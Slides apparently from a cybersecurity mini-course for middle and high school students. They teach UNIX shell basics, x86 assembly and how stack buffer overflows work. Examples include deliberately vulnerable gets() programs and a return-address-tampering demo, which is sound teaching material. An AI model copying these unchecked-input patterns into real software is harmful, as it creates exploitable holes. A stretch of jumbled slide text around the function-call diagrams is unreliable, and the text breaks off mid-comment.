CS 519: Operating System Theory


JerseySTEM Mini-course in Cyber-Security
Course designed by Prof. Vinod Ganapathy, Rutgers University

About this course: Audience
Intended audience: late-stage middle-school and early-stage high-school students (7th-10th graders).
Prerequisites:
  Some programming experience, in any language of your choice. Rudimentary knowledge should suffice, but you should be willing to learn.
  Some exposure to the UNIX shell.
  Willingness to learn new languages and concepts!

About this course: Contents
What you will learn:
  Basic cyber-security concepts.
  Some black-hat hacking skills (how to attack).
  Some white-hat hacking skills (how to defend).
The course will be a mix of theory and hands-on practice. The theory teaches the concepts, and the hands-on exercises reinforce them.

About this course: A warning
Why teach both black-hat and white-hat skills?
  Because you have to "know thy enemy".
  To defend effectively, you have to know how attackers think.
This does not give you license to show off your black-hat hacking skills. You can get into deep trouble with law enforcement if you do so. Consider yourself warned!

Computer security is the study of:
  Weaknesses in systems and attacks against them.
  Defending against such attacks.
  Proactively protecting data against various attacker models.

Goals of computer security
Think of what you would want from your ideal anti-virus:
  Prevent your files from getting corrupted.
  Prevent your identity or credit-card number from being stolen.
  Avoid giving your password to phishing websites.
  (many more examples)

We can abstract these goals into a convenient acronym, C.I.A.:
  Confidentiality: keeping data and resources hidden from attackers.
  Integrity: protecting data from unauthorized modification by attackers.
  Availability: enabling legitimate access to data and resources.

A secure system
Is a computer that is connected to the Internet an example of a secure machine? Can you protect the confidentiality, integrity and availability of data on such a machine? Let's look at these in turn.

Protecting confidentiality: We routinely read of malicious software and attacks that steal credit card numbers, identities, passwords, etc. These attacks violate data confidentiality.

Protecting integrity: Think of ransomware. What does it do? It encrypts your files and prevents you from accessing the data in them. These attacks violate data integrity, because your files are modified without your authorization.

Protecting availability: Denial-of-service (DoS) attacks routinely prevent you from accessing websites. A recent example: the Mirai botnet's DoS attack on Dyn (October 2016), which violated data availability.

Let us disconnect the computer from the Internet. This sacrifices some data availability, but maybe we're willing to live with that.
  Does it protect data confidentiality? No! You can still exfiltrate data out of the machine (think USB sticks!).
  Does it protect data integrity? No! You can still infect the machine with malicious software (again, think USB sticks).

Now, let us disconnect the computer from the Internet and switch it off! Is it secure?
No! Data stored on hard disks can still be recovered by bad guys using forensic tools. There are other kinds of sophisticated attacks too.
Exercise: Google "Cold Boot Attack" and read the associated Wikipedia article.

So, what is a secure system?
The answer to that question is "it depends". If you assume a very powerful adversary, you will need very powerful defences to achieve even basic confidentiality and integrity.
What you assume about the adversary (i.e., the attacker) is called the threat model.

Threat models in practice
Network-based (or remote) attacker:
  Is located remotely and connected to the victim's machine via a network link.
  Can send packets to, and receive packets from, the victim's machine.
  This is the threat model most used in practice. For most of this course, we will work with this threat model.
Local attacker:
  Has an account to log into the victim's machine.
  Perhaps even has physical access to the machine itself.
  Examples: Snowden attacks? Other insider attacks.
  Makes several restricting assumptions about the adversary, so we won't use it in this course.

Course plan
We will start with an overview of the working environment:
  1. Basics of the UNIX shell, compiling programs, and command-line tools.
  2. Simple C programs and their assembly-language programs.
  3. Learning to read assembly code.
  4. Learning to execute and inspect code within a debugger (gdb).

Next up will be buffer overflows, a major cybersecurity threat:
  You will learn the low-level details of how this threat works.
  You will design exploits and work through an obstacle course (each exploit harder than the previous one!).

If you learn how to attack, you should also learn how to defend!
  We will study various popular, deployed buffer overflow defences and learn how you can apply them.
  These are often tested in competitions like CyberPatriot!

Introduction to the UNIX shell and command line, compilers and debuggers

Using the UNIX shell
This will be an interactive introduction to using the UNIX shell.
You have each been given a virtual machine with the Ubuntu Linux distribution installed.
Click on the Ubuntu VM to launch it. After booting up, it will show a login screen. Type the login name root and use the password root.

Congratulations! You are on the UNIX shell. You can now try each of these commands in the virtual machine as you learn about them on the slides.
This virtual machine will be the environment you use for the rest of the course.

Contents
  Shell Intro
  Command Format
  Shell I/O
  Command I/O
  Command Overview
Some content on UNIX shell commands is borrowed from material originally created by S. Mokhov, Concordia Univ.

Shell Intro
A shell is a system program that allows a user to execute:
  shell functions (internal commands)
  other programs (external commands)
  shell scripts
Linux/UNIX has a bunch of them; the most common are:
  tcsh, an expanded version of csh (Bill Joy, Berkeley, Sun)
  bash, one of the most popular and feature-rich shells, an expansion of sh (AT&T Bell Labs). Your VM uses the bash shell.
  ksh, the Korn shell
  ...

Command Format
Format: a command name and 0 or more arguments:
  % commandname [arg1] ... [argN]
The % sign denotes the shell prompt, here and hereafter.
Arguments can be:
  options (switches to the command that indicate a mode of operation), usually prefixed with a hyphen (-) or two (--) in GNU style
  non-options, or operands: basically the data to work with (actual data or a file name)

Shell I/O
The shell is a power-user interface: the user interacts with it by typing in commands.
The shell interprets each command, which may produce some results. The results go back to the user, and (in general) control returns to the user when the command completes.
In the case of external commands, the shell executes actual programs that may call functions of the OS kernel.
These system commands are often wrappers around so-called system calls, which ask the kernel to perform an operation (usually privileged) on your behalf.

Command I/O
Input to the shell: the command name and arguments typed by the user.
Input to a command: keyboard, file, or other commands.
Standard input: keyboard. Standard output: screen. Together, STDIN and STDOUT are often referred to as a terminal.
Both standard input and standard output can be redirected from/to a file or another command.
File redirection:
  <    input
  >    output
  >>   output, append

Commands
As you see each command, try it out on the virtual machine.

man: Manual Pages
The first command to remember. Contains info about almost everything :-)
  other commands
  system calls
  C/library functions
  other utils, applications, configuration files
To read about man itself, type:
  % man man
NOTE: unfortunately, there's no % man woman ...

which
Displays the path name of a command. Searches the PATH environment variable for the command and displays the absolute path.
To find which tcsh and bash are actually in use, type:
  % which tcsh
  % which bash
  % man which        for more details

chsh: Change Login Shell
The login shell is the shell that interprets your commands by default after you log in.
You can change it with chsh (provided that your system admin allows you to do so).
To list all possible shells, depending on implementation:
  % chsh -l
  % cat /etc/shells
  % chsh             with no arguments, prompts you for the shell

whereis
Displays all locations of a command (or some other binary, man page, or source file).
Searches a standard set of directories to find commands that match the whereis argument.
  % whereis tcsh

passwd
Change your login password. A very good idea after you have been given a new one.
It's usually a paranoid program, asking that your password have at least 6 characters, with at least two alphabetical characters and one numerical character. Some other restrictions (e.g. dictionary words or similarity to a previous password) may apply.
Depending on privilege, one can change users' and groups' passwords as well as real name, login shell, etc.
  % man passwd

date
Guess what :-) Displays dates in various formats.
  % date
  % date -u          in GMT
  % man date

cal
Calendar.
  % cal              current month
  % cal 2 2000       Feb 2000, leap year
  % cal 2 2100       not a leap year
  % cal 2 2400       leap year
  % cal 9 1752       11 days skipped
  % cal 0            error
  % cal 2002         whole year
Years range: 1 - 9999. There is no year 0.
The calendar was corrected in 1752, which removed 11 days.

clear
Clears the screen. There's a keyboard shortcut for it: Ctrl+L.
Example sequence:
  % cal
  % clear
  % cal
  Ctrl+L

sleep
"Sleeping" is doing nothing for some time. Usually used for delays in shell scripts.
  % sleep 2          2-second pause

Command Grouping
Semicolon: ";"
A parenthesized group often acts as if it were a single command, so the output of several commands can be redirected to one file:
  % (date; cal; date) > out.txt

alias
Defines a new name for a command.
  % alias                          with no arguments, lists currently active aliases
  % alias newcommand oldcommand    defines newcommand
  % alias cl cal 2003
  % cl
The form above is csh/tcsh syntax. In bash, the shell your VM uses, write alias cl='cal 2003' instead.

unalias
Removes an alias. Requires an argument.
  % unalias cl

history
Displays a history of recently used commands.
  % history          all commands in the history
  % history 10       last 10
  % history -r 10    reverse order (tcsh)
  % !n               repeat command n in the history
  % !-1              repeat last command (same as !!)
  % !-2              repeat second-last command
  % !ca              repeat last command that begins with ca
  % !!               repeat last command

exit / logout
Exit from your login session.
  % exit
  % logout

shutdown
Causes the system to shut down or reboot cleanly. May require superuser privileges.
  % shutdown -h now    stop
  % shutdown -r now    reboot

ls
Lists directory contents. Has a whole bunch of options; see man ls for details.
  % ls               all files except those starting with a "."
  % ls -a            all
  % ls -A            all without "." and ".."
  % ls -F            append "/" to dirs and "*" to executables
  % ls -l            long format
  % ls -al
  % ls -lt           sort by modification time (latest - earliest)
  % ls -ltr          reverse

cat
Displays and concatenates files.
  % cat
    Will read from STDIN and print to STDOUT every line you enter.
  % cat file1 [file2] ...
    Will concatenate all the files into one and print them to STDOUT.
  % cat > filename
    Will take whatever you type on STDIN and put it into the file filename.
To exit cat or cat > filename, type Ctrl+D to indicate EOF (End of File).

more / less
Pagers that display the contents of large files page by page, or scroll line by line up and down.
They have a lot of viewing options and search capability.
Interactive. To exit: q

less
less ("less is more") is a bit smarter than the more command.
To display the contents of a file:
  % less filename
To display line numbers:
  % less -N filename
To display a prompt:
  % less -P"Press 'q' to quit" filename
Combine the two:
  % less -NP"Blah-blah-blah" filename
For more information:
  % man less

touch
By touching a file you either create it, if it did not exist (with 0 length), or you update its last modification and access times.
There are options to override the default behavior.
  % touch file
  % man touch

cp
Copies files / directories.
  % cp [options]
  % cp file1 file2
  % cp file1 [file2] /directory
Useful option: -i, to prevent overwriting existing files by prompting the user to confirm.

mv
Moves or renames files/directories.
  % mv source destination      the source gets removed
  % mv file1 dir/
  % mv file1 file2             rename
  % mv file1 file2 dir/
  % mv dir1 dir2

rm
Removes file(s) and/or directories.
  % rm file1 [file2] ...
  % rm -r dir1 [dir2] ...
  % rm -r file1 dir1 dir2 file4 ...

script
Writes a log (a typescript) of whatever happened in the terminal to a file.
  % script [file]
  % script           the whole log is saved into a file named typescript
  % script file      the whole log is saved into a file named file
To exit logging, type:
  % exit

find
Looks up a file in a directory tree.
  % find . -name name
  % find . \( -name 'w*' -or -name 'W*' \)

mkdir
Creates a directory.
  % mkdir newdir
Often people make an alias of md for it.

cd
Changes your current directory to a new one.
  % cd /some/other/dir    absolute path
  % cd subdir             assuming subdir is in the current directory
  % cd                    returns you to your home directory

pwd
Prints the working directory, i.e. your current directory.
  % pwd

rmdir
Removes an empty directory.
  % rmdir dirname
For an empty directory, this is equivalent to:
  % rm -r dirname
Note that rm -r also removes a directory that still has contents, while rmdir refuses to.

ln
Symbolic link, or a "shortcut" in Microsoft terminology.
  % ln -s target linkname

chmod
Changes file permissions.
Possible invocations:
  % chmod 600 filename
    -rw------- 1 user group 2785 Feb 8 14:18 filename
    (it is not very intuitive where 600 comes from)
  % chmod u+rw filename
    (gives the owner the same read and write permissions, and is more readable)
For the assignment:
  % chmod u+x myshellscript
    (myshellscript is now executable)
    -rwx------ 1 user group 2785 Feb 8 14:18 myshellscript

grep
Searches its input for a pattern. The pattern can be a simple substring or a complex regular expression.
If a line matches, it's directed to STDOUT; otherwise, it's discarded.
  % echo blah-foo | grep blah      will print the matching line
  % echo blah-foo | grep zee       will not
See a separate grep tutorial.

Pipes
What's a pipe?
  It is a method of interprocess communication (IPC).
  In shells, a '|' symbol is used.
  It means that the output of one program (on one side of the pipe) serves as the input for the program on the other end.
  A set of "piped" commands is often called a pipeline.
Why is it useful?
  Because by combining simple OS utilities one can easily solve more complex tasks.

Editors: vim/emacs
To edit a file, you use an editor. Both vim and emacs are very good editors. Choose one and learn how to use it. There are lots of online resources for new users of emacs and vim.
  % vim foo.txt
This opens up a new file called foo.txt. Learn to type some content in it, save it, etc.

Compilers: gcc
When you write code (e.g., a C program), it must be compiled before it can be executed.
The compiler converts C code into a format that the machine can understand. This is called the binary executable or binary code.
To compile a C program called foo.c:
  % gcc foo.c -o foo.out
This produces a binary executable called foo.out, which you can execute as follows:
  % ./foo.out [any inputs to foo]
By default, if you don't specify an output name with -o, the output file is called a.out.

If you want to compile a C program, you can use the C programs in function_call_example.c or gets_example.c to try out the compiler.

Disassemblers: objdump
You may be curious to see the code in foo.out.
This code is stored in binary form (usually displayed in hexadecimal notation), which is not human-readable.
But there is an equivalent human-readable notation, called assembly code. This notation expresses the code in terms of the instructions of the processor.
The process of recovering and inspecting the assembly code is called disassembly.
  % objdump -D foo.out
You can disassemble the file called a.out that you got by compiling the previous C file if you would like to try objdump.
You might not understand the output of objdump just yet, but we will be learning to read and understand assembly code in much more detail very soon!

Debuggers: gdb
Debuggers let you reason about the runtime behaviour of a program.
You can use debuggers to understand why a program is crashing or not behaving as expected.
You can also use debuggers to inspect the state of the program as it runs, e.g., observing the values stored at different memory locations and registers.
Debuggers are very useful in creating attacks against vulnerable programs and in understanding how to defend against them. You will be using the debugger extensively later in this course.
You can invoke the debugger using:
  % gdb a.out
Once you're in, type help to learn how to use various aspects of the debugger.

A primer of the x86 assembly language

X86 primer
In the next unit, we will be extensively using x86 instructions. So let us review some basic x86 instructions that we will encounter, and understand their functionality.
The x86 instruction set is vast and complex. This is by no means a comprehensive overview! We are only reviewing basic instructions.
The handout x86.pdf on the class webpage covers this material in more detail, and is optional reading for interested students.

A program's code contains binary instructions:
  The CPU executes one instruction at a time.
  It usually executes the next sequential instruction in memory.
  Branch/jump/call instructions specify a different next instruction.
Instructions typically manipulate registers (a small number of values kept by the processor) and memory.

Most instructions are two-operand instructions. Unfortunately, there are two popular syntaxes (formats) to represent these instructions:
  Intel format: OP DST, SRC
  AT&T (gcc) format: OP SRC, DST
We will stick to the AT&T syntax.

X86 instructions refer to registers. On the Intel x86, there are several registers, represented as %eax, %ebx, %ecx, %edx, etc. There are also two special-purpose registers called %esp (the stack pointer) and %ebp (the base pointer). We will study the role of these special-purpose registers in the next unit.
X86 instructions can also refer to constant values and memory locations. It is best to understand these things using examples.

movl %eax, %edx: This instruction copies the value stored in the register eax into the register edx, i.e., edx = eax.
movl $0x123, %edx: This instruction stores the constant value 0x123 (hexadecimal) in the register edx.
movl 0x124, %edx: This instruction copies the value stored at memory address 0x124 to the register edx. You can think of memory as containing a number of slots, each of which has an address. In this case, the contents stored at address 0x124 are being copied into edx.
movl (%ebx), %edx: Here, the processor looks up what is stored in %ebx, treats it as an address, and stores the value at that address into edx. For those familiar with C-like syntax, this is essentially edx = *(ebx).
movl 4(%ebx), %edx: Here, the processor looks up what is stored in %ebx, adds 4 to that address, and stores the value at that newly-computed address into edx. For those familiar with C-like syntax, this is edx = *(ebx+4).

There are common arithmetic instructions: addl (for adding two values), subl (for subtracting one value from another), etc.
addl %edx, %eax: adds the value of edx to eax, i.e., eax = eax + edx.
subl %edx, %eax: subtracts the value of edx from eax, i.e., eax = eax - edx.
The push and pop instructions push and pop values from a stack; the concept of a stack will become clear in the next unit.
For now, these are all the instructions we will need to understand. We will also need the call and ret instructions, but we will visit them in the upcoming unit.

Exploiting Buffer Overflow Vulnerabilities

What is a buffer overflow?
[Photo: Oroville dam overflow, California, 2/2017. Photo credit: SFGate]

The dam analogy
You have some buffer space (the reservoir) to hold some resource (the water).
What happens if you store more water in the reservoir than there is space for? The water overflows from the side, causing large amounts of damage to the countryside.
The same thing happens on a computer system when you have a buffer overflow in a program.
  But what is a "buffer" in a computer program?
  And what sorts of damage can a buffer overflow do?

What is a buffer overflow?
A kind of programming error that often happens in C and C++ programs. At its heart:
  Your program allocated some space in memory to store some data (the buffer).
  But you wrote more data into the buffer than there is space to accommodate.
What this learning unit is all about: how bad guys have exploited this simple programming error to launch devastating security attacks.

A long history of famous exploits
Buffer overflow vulnerabilities have resulted in numerous high-profile exploit incidents:
  Morris worm (1988), the first recorded computer worm
  Code Red (2001)
  Sasser worm (2004)
  ... (numerous others in the intervening years!)
  Most recent high-profile incident: Heartbleed (2014)
Exercise: What is the difference between a vulnerability and an exploit?

Closer to the goals of this course
Most online capture-the-flag-style cyber security competitions feature programs that have buffer overflow vulnerabilities.
Competitors are tasked with finding where the vulnerabilities lie and exploiting them.

Buffer overflow example: Benign example
    int foo(void){
        char buf[8];
        strcpy(buf, "hello world");
    }
What does this program do? What is the functionality of the strcpy statement?
Why is there a buffer overflow? The program allocated 8 bytes for buf, but wrote 12 bytes into it (the 11 characters of "hello world" plus the \0 character at the end).
Is this buffer overflow vulnerability exploitable? Likely not. A constant string is written into the buffer, so an attacker has no control over what gets written. This is an example of a benign buffer overflow.

Buffer overflow example: Malicious example
    int get_user_input(void){
        char buf[1024];
        gets(buf);
    }
What does this program do? What is the functionality of the gets statement?
Why is there a buffer overflow? The program allocated 1024 bytes for buf. But gets reads user input from standard input and writes it into buf. gets will continue to read input until it encounters a newline (or the end of the input), potentially writing more than 1024 bytes into buf.

So why is this dangerous? In this learning unit, we will learn that:
  An attacker can use this to feed arbitrary inputs to the program that executes the above code snippet.
  The attacker can use these inputs to completely take over control of the program containing the above code snippet.
  Which means the attacker can do whatever the program can do: read all its data, write over all its data, etc.
  This compromises both confidentiality and integrity!

Gets-based program
Navigate to the gets_example directory, open gets_example.c within your virtual machine, and study the program. (Type cat gets_example.c.)
Now compile it: type gcc gets_example.c.
  The compiler emitted a warning about gets being deprecated. What was the warning and what does it mean?
  Do you see a file called a.out created by the compiler?
Now run a.out: type ./a.out on the command line.
  It waits for your input: give it some input and observe the program's behaviour.
  Can you try to crash the program by giving it arbitrary inputs?
Feeding a long input to the program gets pretty painful, doesn't it?
  Fortunately, we have created a long input for you. See the contents of the file input.txt: type cat input.txt on the command line.
  How do you feed the contents of input.txt to your program?
Use the UNIX pipe facility. The UNIX pipe is a redirection mechanism that lets one program consume the output of another.
  % cat input.txt | ./a.out

  % cat input.txt | ./a.out
Now what does your program do?
  Why does it terminate with a "Segmentation fault"?
  What is a "Segmentation fault"? Hint: it has something to do with the notion of x86 segments that you studied in the x86 unit.
  Is the output identical to the contents of input.txt? Why not?

How attackers locate buffer overflow vulnerabilities
What you just did is a simple example of fuzzing:
  Fuzzing is the practice of feeding random inputs to a program and observing its behaviour.
  If the program crashes with a segmentation fault, there is very likely a buffer overflow vulnerability in it.
  That is often the first step hackers take towards exploiting the program.
  There are other methods too: source code inspection (if the source code is available), machine code inspection, etc.

Understanding process layouts
To exploit a buffer overflow, we first need to understand the concept of a process.
  A process is the in-memory representation of a running program.
  In the example you just worked on, a.out is the program, and the process was created when you ran it using ./a.out.
  A process contains the data structures allocated in the program and the code you wrote for the program. The code operates on and manipulates the data structures.
  You need to understand the layout of code and data in a process before you exploit it.
[Figure: Program -> Run -> Memory representation of a process]

Code and data layout
Within a process, all data is stored as an array of bytes.
  Interpretation depends on the instructions (i.e., code) used.
C and C++ programs allow the code to directly access memory (and don't check bounds), and hence are vulnerable to buffer overflow exploits.

Process address space
Every process has an address space in memory.
  The address space is the set of memory addresses that are accessible to the process.
  Every address can store a piece of data, usually one byte long.
  Computers work in binary, and hexadecimal is a compact way of writing binary numbers, so we represent these addresses as hexadecimal numbers.
On a 32-bit processor, the address space has addresses going from 0x00000000 to 0xFFFFFFFF (in hexadecimal notation).
  0x00000000 is called the bottom of the address space, while 0xFFFFFFFF is the top of the address space.
  Look at the picture on the slide to see how the process is laid out from the top of the address space (top of memory) to the bottom of the address space (bottom of memory).
Look in the address space for something called the stack.
  Every program has a stack.
  The stack is dynamic in that it can grow and shrink as the program executes.
  The stack grows every time a function in the program is called and shrinks when the function returns.

The stack's base is located at a fixed address in the address space.
The top of the stack is the most recent entry of the stack, while the base contains the oldest entries.
The stack is an example of a data structure, very much like a stack of cafeteria plates: push to the top, pop from the top.
Each function in the program gets an entry in the stack when the function is called. The stack entry reserves space for that function's local variables.
Let us now look at an example program and its stack.

Let us look at a program with two functions
    void foo(int a, int b, int c){
        char buf1[8];
        char buf2[12];
    }
    void main() {
        foo(1, 2, 3);
    }

To start off, let us suppose that the program has started execution as a process, and that we are in the main function. The stack diagram on the slide shows the stack entry for main.
The bottom of the stack and the top of the stack are shown. Right now, the stack only has one entry.
[Stack diagram: a single entry for main, with the bottom and the top of the stack marked.]

On Intel x86, the stack grows DOWNWARDS (towards lower addresses), so the bottom and the top are not where you'd expect them. KEEP THIS FACT IN MIND MOVING FORWARD!

The Intel x86 uses two special registers, ebp and esp, to denote the bottom of the current stack entry and the top of the current stack entry, respectively.

Now suppose we execute the statement where main calls the function foo. A new stack entry is pushed to the top of the stack for the function foo. But several things happen before that.

The arguments to the function foo are pushed to the top of the stack in reverse order: first 3, then 2, then 1.
[Stack diagram: main's entry followed by 3, 2, 1, with esp pointing at the 1.]
Notice how the value of esp kept changing as the values of the function arguments were pushed on the stack.
Note: depending on your compiler, arguments may be pushed by main or foo.

Each such argument is 4 bytes in length (the size of an integer on 32-bit Intel x86). So esp's value is reduced by 12 (3 arguments of 4 bytes each) compared with its value just before the arguments were pushed.

112 esp 3 2 1 Why push in reverse order? ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() { foo(1, 2, 3);

} Open the directory function_call_example and the C file there. Compile it and observe the assembly code (for your convenience: assembly.txt). Navigate to the assembly code of main. 113 esp 3 2 1

Why push in reverse order? ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } esp void main() { foo(1, 2, 3); } Can you locate the instructions that push the arguments to

the stack? What does the instruction movl $0x3, 0x8(%esp) do? What do you think 0x8(%esp) represents? Hint: we have already seen this in the x86 primer 114 3 2 1 The call instruction ebp

The code executes the call instruction. Notice that %esp got pushed down and a return address was pushed on to the stack. You don't see this explicitly in the assembly code, so what's going on?

When you call a function, the processor somehow needs to remember where to return to. In this case, it is the instruction following the call to foo. In the code example in the VM, it is the code for v = 1.

Exercise: What is the address that is pushed on to the stack as the return address? Answer: 0x8048417. Why?

After the call to foo

Now the processor starts executing the code in foo. It starts with a push %ebp. Remember this instruction. We will come back to it later and examine why the processor does this. This pushes the current value stored in the ebp register to the top of the stack.

The next instruction changes the value of ebp to the current value of esp.

And the instruction following that subtracts the value 0x20 (hexadecimal, i.e., 32 bytes) from the value of %esp. Why do you think this happens?

[Stack diagram: the arguments 3, 2, 1, then the return address, then the saved value of ebp (where ebp now points), then the space for buf1 and buf2 (esp points to the top).]

As you may have guessed from the color-coding, a new stack entry is created for the body of the function foo. It reserves space for the two buffers in the function.
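The sequence call, push %ebp, mov %esp,%ebp, sub $0x20,%esp can be traced with plain arithmetic. The sketch below is an illustration under stated assumptions: FrameLayout and enter_foo are hypothetical names, addresses are just numbers, and the starting value of esp in the usage note is made up.

```c
#include <assert.h>
#include <stdint.h>

/* Where things end up once foo's stack entry has been set up. */
typedef struct {
    uint32_t ret_addr_slot;   /* where call stored the return address   */
    uint32_t saved_ebp_slot;  /* where push %ebp stored main's ebp      */
    uint32_t ebp;             /* foo's ebp after mov %esp,%ebp          */
    uint32_t esp;             /* foo's esp after sub $0x20,%esp         */
} FrameLayout;

/* esp_before_call is the value of esp after the arguments are in place
   and just before the call instruction executes. */
FrameLayout enter_foo(uint32_t esp_before_call) {
    FrameLayout f;
    uint32_t esp = esp_before_call;
    assert(esp >= 0x28);                 /* room for 4 + 4 + 0x20 bytes */

    esp -= 4; f.ret_addr_slot = esp;     /* call: push return address   */
    esp -= 4; f.saved_ebp_slot = esp;    /* push %ebp                   */
    f.ebp = esp;                         /* mov %esp,%ebp               */
    esp -= 0x20;                         /* sub $0x20,%esp: room for locals */
    f.esp = esp;
    return f;
}
```

For example, starting from a made-up esp of 0x1000, the return address lands at 0xffc, the saved ebp at 0xff8 (which is also the new ebp), and esp ends at 0xfd8. The return address always sits 4 bytes above the new ebp.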

Why save %ebp?

Let us return to that push %ebp instruction. What was its purpose? Examine the state of the stack as it stands now, and the stack as it appeared before we started doing any of this. What remains invariant?

Answer: %ebp always points to the bottom of the current stack entry, and %esp always points to the top.

Question: Why did we save the old value of %ebp on the stack?

Answer: Look at the instructions leave and ret in the body of foo.

The return address

What is the return address used for by the postal service?
To identify the sender
To know where to return any unreachable mail

The return address in computer programs serves a similar purpose: it identifies the location to which control must return after a function that was called has completed its job.

The return address

The return address that is stored on the stack is a very important aspect of ensuring correct operation of a program. If you tamper with the return address, you can change the way the program's control flow goes. Let us look at a simple, benign example of what happens when you tamper with the return address that is stored on the stack.

The leave and ret instructions

Again, open function_call_example.c, and study the

assembly code for the function foo. Look at the last two instructions of the function. They are leave and ret. What do they do? Let us try to understand.

The leave and ret instructions

When main calls foo, the stack looks like the left side of the picture below. When foo finishes its job and returns, the stack needs to be restored to its original state (right side).

[Stack diagram, left: the arguments 3, 2, 1, the return address, the saved value of ebp (ebp points here), buf1 and buf2 (esp points to the top). Right: only main's stack entry, with the original ebp and esp.]

Moreover, control needs to return from foo to main.

The leave instruction in foo discards foo's local variables by setting %esp to the value of %ebp, and then restores %ebp by popping the saved value of %ebp from the stack.

The ret instruction transfers the processor's control to the return address stored on the stack, and pops the return address from the stack. When both these instructions execute, the stack is restored to its original state.

Return address modification.

    #include <stdio.h>

    void foobar(int a) {
        char buf[8];
        int *ret;
        ret = (int *)(buf + 24);
        *ret += 8;
    }

    void main() {
        int x;
        x = 0;
        foobar(1);
        x = 1;
        printf("%d\n", x);
    }

In your VM, go to the file benign_retaddr_modif.c. The code there is roughly as shown above. Look at this program and guess what its output will be, in particular the output of printf. The body of main is just a straight-line piece of code. So we would expect the output to be 1. Right? Now compile and run the program in your VM. The output is 0! What's going on?

Return address modification.

Something very strange is going on. Comment out the call to foobar(1) in the main program, recompile the program and run it. Now what is the output? You see that it prints 1, as expected. So what is foobar doing that is causing printf to print 0? The body of foobar does not change the value of x directly. So how did printf print 0, and not 1? Let's find out.

Uncomment the call to foobar(1), compile the program and look at its assembly code. It has been provided for you in assembly.txt.

Return address modification.

Let us first see what the stack would look like when main calls foobar.

[Stack diagram: the argument 1, the return address, the saved value of ebp (ebp points here), and buf (esp points to the top).]

It would look like the one shown alongside, with the stack entry for main shown in green, and the stack entry for foobar shown in yellow.

What is the difference in values between %esp and %ebp? Answer: 24. Why? Hint: Look at the assembly code of foobar and see the quantity subtracted from esp.

OK, so %esp and %ebp are separated by 24 bytes. The value of %ebp saved on the stack is 4 bytes. So the return address is located exactly 28 bytes away from %esp.

Look at the source code of the program and look at the assembly code of foobar. Can you locate the register that points to the beginning of buf? It is %ebp - 0x14. How do you know that? Hint: look at the instruction lea -0x14(%ebp),%eax. The address of buf is 20 bytes (or 0x14) below ebp. That address is stored in eax.

The next instruction says add $0x18,%eax, which adds the value 0x18 (24 in decimal) to %eax. This corresponds to the source line ret = buf + 24. So what stack location would the new value of %eax point to? It would point to the return address! Starting 20 bytes below ebp and moving up 24 bytes lands 4 bytes above ebp, just past the 4-byte saved value of %ebp. This location is denoted by the source variable ret in the program.
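The offset arithmetic above can be replayed safely on a simulated frame instead of the real stack. The following is a sketch, not the course's program: the frame is an ordinary byte array, offsets are measured from esp, and the names (buf_offset, ret_slot_offset, bump_return_address) are hypothetical. The constants 24 and 20 are the ones read from the disassembly discussed above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum {
    ESP_TO_EBP    = 24,  /* bytes between esp and ebp in foobar      */
    BUF_BELOW_EBP = 20,  /* buf starts at ebp - 0x14                 */
    SAVED_EBP     = 4,   /* size of the saved ebp                    */
    FRAME_BYTES   = ESP_TO_EBP + SAVED_EBP + 4  /* up to the return address */
};

/* Byte offsets from esp (offset 0 is the top of the stack). */
size_t buf_offset(void)      { return ESP_TO_EBP - BUF_BELOW_EBP; }
size_t ret_slot_offset(void) { return buf_offset() + 24; }  /* buf + 24 */

/* Mimics "*ret += delta" on the simulated frame and returns the new
   return address. */
uint32_t bump_return_address(unsigned char frame[FRAME_BYTES], uint32_t delta) {
    uint32_t ret;
    assert(frame != NULL);
    assert(ret_slot_offset() + sizeof ret <= (size_t)FRAME_BYTES);
    memcpy(&ret, frame + ret_slot_offset(), sizeof ret);
    ret += delta;
    memcpy(frame + ret_slot_offset(), &ret, sizeof ret);
    return ret;
}
```

Here buf sits at offset 4 from esp, so buf + 24 is offset 28, which is exactly the slot just above the 4-byte saved ebp. Adding 8 to whatever address is stored there makes the function return 8 bytes later than it otherwise would.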

Return address modification.

The next instruction in the program increments the value stored at the address pointed to by ret (i.e., *ret) by 8. So this would cause the program to return to another location. But which location? Let's find out.

Look at the assembly code for main and locate the call to foobar. The original return address must have been the address of the instruction just following the call to foobar. What is that? 0x80484c5.

What does that instruction do? It seems to be moving the value 1 to 0x1c(%esp). What is 0x1c(%esp)? It is the place where the variable x is stored in the stack entry of main! This instruction corresponds to x = 1 in the program!

By incrementing the return address by 8 bytes, we are asking the processor to return to the instruction at 0x80484cd instead of 0x80484c5! Thus, we're effectively asking the processor to skip over the instruction x = 1. Thus, printf prints the value 0!

Experiment: Change the statement *ret += 8 to use various other values (e.g., *ret += 24). Recompile the program and run it. What do you observe? Why?

Experiment: Change the statement ret = buf + 24 to use various other values (e.g., ret = buf + 28 or ret = buf + 32). Recompile the program and run it. What do you observe? Why?

Importance of the return address

The previous exercise must have convinced you of the importance of the return address stored on the stack, and of how modifying it can alter the control flow of the program.

What would happen if we let an attacker control the return address stored on the stack?

What harm could it do? How could an attacker control the return address? Let's find out.

Importance of the return address

Imagine this program.

    void foo(int a, int b, int c) {
        char buf[8];
        gets(buf);
    }

    void main() {
        foo(1, 2, 3);
    }

What does gets do? Recall how you crashed a program that had gets in a previous exercise.

[Stack diagram: the arguments 3, 2, 1, the return address, the saved value of ebp (ebp points here), and buf (esp points to the top).]

gets allows an attacker to enter data into buf. Since gets keeps writing into buf until it sees a newline (or the end of the input), without ever checking the size of buf, the attacker can keep writing past the end of buf and into other areas of the stack, including the return address.

The attacker can use the input into buf to change the return address!
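The effect of an unchecked write can be shown without actually corrupting a real stack. The sketch below models a stack entry as a 16-byte array and is an illustration only: the layout (an 8-byte buf directly below a 4-byte saved ebp and a 4-byte return address) is an assumption, since real compilers often add padding, and unchecked_read and return_address are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed layout of the simulated stack entry, lowest address first:
   bytes 0..7 buf, bytes 8..11 saved ebp, bytes 12..15 return address. */
enum { BUF_SIZE = 8, SAVED_EBP_OFF = 8, RET_OFF = 12, FRAME_SIZE = 16 };

/* Read a 4-byte little-endian value, as x86 stores it in memory. */
uint32_t read_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Like gets, this copies the input into buf without comparing its
   length against BUF_SIZE. To keep the sketch itself memory-safe, it
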